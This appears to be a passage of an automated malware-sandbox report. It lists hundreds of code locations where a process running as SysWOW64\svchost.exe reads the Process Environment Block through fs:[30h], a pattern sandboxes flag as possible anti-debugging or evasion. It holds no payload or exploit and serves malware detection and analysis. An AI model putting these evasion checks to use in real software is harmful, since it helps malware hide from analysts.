            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E284 mov eax, dword ptr fs:[00000030h]1_2_0386E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E284 mov eax, dword ptr fs:[00000030h]1_2_0386E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B0283 mov eax, dword ptr fs:[00000030h]1_2_038B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B0283 mov eax, dword ptr fs:[00000030h]1_2_038B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B0283 mov eax, dword ptr fs:[00000030h]1_2_038B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038402A0 mov eax, dword ptr fs:[00000030h]1_2_038402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038402A0 mov eax, dword ptr fs:[00000030h]1_2_038402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h]1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C62A0 mov ecx, dword ptr fs:[00000030h]1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h]1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h]1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h]1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h]1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h]1_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h]1_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h]1_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h]1_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h]1_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039062D6 mov eax, dword ptr fs:[00000030h]1_2_039062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038402E1 mov eax, dword ptr fs:[00000030h]1_2_038402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038402E1 mov eax, dword ptr fs:[00000030h]1_2_038402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038402E1 mov eax, dword ptr fs:[00000030h]1_2_038402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382823B mov eax, dword ptr fs:[00000030h]1_2_0382823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B8243 mov eax, dword ptr fs:[00000030h]1_2_038B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B8243 mov ecx, dword ptr fs:[00000030h]1_2_038B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0390625D mov eax, dword ptr fs:[00000030h]1_2_0390625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382A250 mov eax, dword ptr fs:[00000030h]1_2_0382A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836259 mov eax, dword ptr fs:[00000030h]1_2_03836259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EA250 mov eax, dword ptr fs:[00000030h]1_2_038EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EA250 mov eax, dword ptr fs:[00000030h]1_2_038EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03834260 mov eax, dword ptr fs:[00000030h]1_2_03834260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03834260 mov eax, dword ptr fs:[00000030h]1_2_03834260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03834260 mov eax, dword ptr fs:[00000030h]1_2_03834260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382826B mov eax, dword ptr fs:[00000030h]1_2_0382826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03870185 mov eax, dword ptr fs:[00000030h]1_2_03870185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EC188 mov eax, dword ptr fs:[00000030h]1_2_038EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EC188 mov eax, dword ptr fs:[00000030h]1_2_038EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D4180 mov eax, dword ptr fs:[00000030h]1_2_038D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D4180 mov eax, dword ptr fs:[00000030h]1_2_038D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B019F mov eax, dword ptr fs:[00000030h]1_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B019F mov eax, dword ptr fs:[00000030h]1_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B019F mov eax, dword ptr fs:[00000030h]1_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B019F mov eax, dword ptr fs:[00000030h]1_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382A197 mov eax, dword ptr fs:[00000030h]1_2_0382A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382A197 mov eax, dword ptr fs:[00000030h]1_2_0382A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382A197 mov eax, dword ptr fs:[00000030h]1_2_0382A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F61C3 mov eax, dword ptr fs:[00000030h]1_2_038F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F61C3 mov eax, dword ptr fs:[00000030h]1_2_038F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h]1_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h]1_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h]1_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h]1_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039061E5 mov eax, dword ptr fs:[00000030h]1_2_039061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038601F8 mov eax, dword ptr fs:[00000030h]1_2_038601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DA118 mov ecx, dword ptr fs:[00000030h]1_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DA118 mov eax, dword ptr fs:[00000030h]1_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DA118 mov eax, dword ptr fs:[00000030h]1_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DA118 mov eax, dword ptr fs:[00000030h]1_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F0115 mov eax, dword ptr fs:[00000030h]1_2_038F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03860124 mov eax, dword ptr fs:[00000030h]1_2_03860124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h]1_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h]1_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C4144 mov ecx, dword ptr fs:[00000030h]1_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h]1_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h]1_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382C156 mov eax, dword ptr fs:[00000030h]1_2_0382C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C8158 mov eax, dword ptr fs:[00000030h]1_2_038C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836154 mov eax, dword ptr fs:[00000030h]1_2_03836154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836154 mov eax, dword ptr fs:[00000030h]1_2_03836154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904164 mov eax, dword ptr fs:[00000030h]1_2_03904164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904164 mov eax, dword ptr fs:[00000030h]1_2_03904164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383208A mov eax, dword ptr fs:[00000030h]1_2_0383208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038280A0 mov eax, dword ptr fs:[00000030h]1_2_038280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C80A8 mov eax, dword ptr fs:[00000030h]1_2_038C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F60B8 mov eax, dword ptr fs:[00000030h]1_2_038F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F60B8 mov ecx, dword ptr fs:[00000030h]1_2_038F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B20DE mov eax, dword ptr fs:[00000030h]1_2_038B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0382A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038380E9 mov eax, dword ptr fs:[00000030h]1_2_038380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B60E0 mov eax, dword ptr fs:[00000030h]1_2_038B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382C0F0 mov eax, dword ptr fs:[00000030h]1_2_0382C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038720F0 mov ecx, dword ptr fs:[00000030h]1_2_038720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B4000 mov ecx, dword ptr fs:[00000030h]1_2_038B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h]1_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h]1_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h]1_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h]1_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382A020 mov eax, dword ptr fs:[00000030h]1_2_0382A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382C020 mov eax, dword ptr fs:[00000030h]1_2_0382C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C6030 mov eax, dword ptr fs:[00000030h]1_2_038C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03832050 mov eax, dword ptr fs:[00000030h]1_2_03832050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6050 mov eax, dword ptr fs:[00000030h]1_2_038B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385C073 mov eax, dword ptr fs:[00000030h]1_2_0385C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D678E mov eax, dword ptr fs:[00000030h]1_2_038D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038307AF mov eax, dword ptr fs:[00000030h]1_2_038307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E47A0 mov eax, dword ptr fs:[00000030h]1_2_038E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383C7C0 mov eax, dword ptr fs:[00000030h]1_2_0383C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B07C3 mov eax, dword ptr fs:[00000030h]1_2_038B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038527ED mov eax, dword ptr fs:[00000030h]1_2_038527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038527ED mov eax, dword ptr fs:[00000030h]1_2_038527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038527ED mov eax, dword ptr fs:[00000030h]1_2_038527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BE7E1 mov eax, dword ptr fs:[00000030h]1_2_038BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038347FB mov eax, dword ptr fs:[00000030h]1_2_038347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038347FB mov eax, dword ptr fs:[00000030h]1_2_038347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C700 mov eax, dword ptr fs:[00000030h]1_2_0386C700
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03830710 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03860710 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0386C720 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0386273C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0386273C mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0386273C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038AC730 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0386674D mov esi, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0386674D mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03830750 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038BE75D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03872750 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038B4755 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03838770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03840770 mov eax, dword ptr fs:[00000030h] (12 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03834690 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0386C6A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038666B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0386A6C7 mov ebx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0386A6C7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038B06F1 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038AE609 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0384260B mov eax, dword ptr fs:[00000030h] (7 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03872619 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0384E627 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03866620 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03868620 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0383262C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0384C640 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038F866E mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0386A660 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03862674 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03832582 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03832582 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03864588 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0386E59C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038B05A7 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038545B1 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0386E5CF mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038365D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0386A5D0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h] (8 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038325E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0386C5ED mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038C6500 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03904500 mov eax, dword ptr fs:[00000030h] (7 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03840535 mov eax, dword ptr fs:[00000030h] (6 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03838550 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0386656A mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038EA49A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038364AB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038644B0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038BA4B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038304E5 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03868402 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0382E420 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0382C427 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h] (7 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h] (8 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038EA456 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0382645D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0385245A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038BC460 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0385A470 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03840BBE mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038E4BB0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03850BCB mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03830BCD mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038DEBD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03838BF0 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0385EBFC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038BCBF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03904B00 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h] (9 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0385EB20 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038F8B28 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038E4B4B mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03902B57 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038C6B40 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038FAB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038D8B42 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03828B50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038DEB50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0382CB7E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h] (9 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03904A80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03868A90 mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03838AA0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03886AA4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03886ACC mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03830AD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_03864AD0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_0386AAEE mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe  Code function: 1_2_038BCA11 mov eax, dword ptr fs:[00000030h]
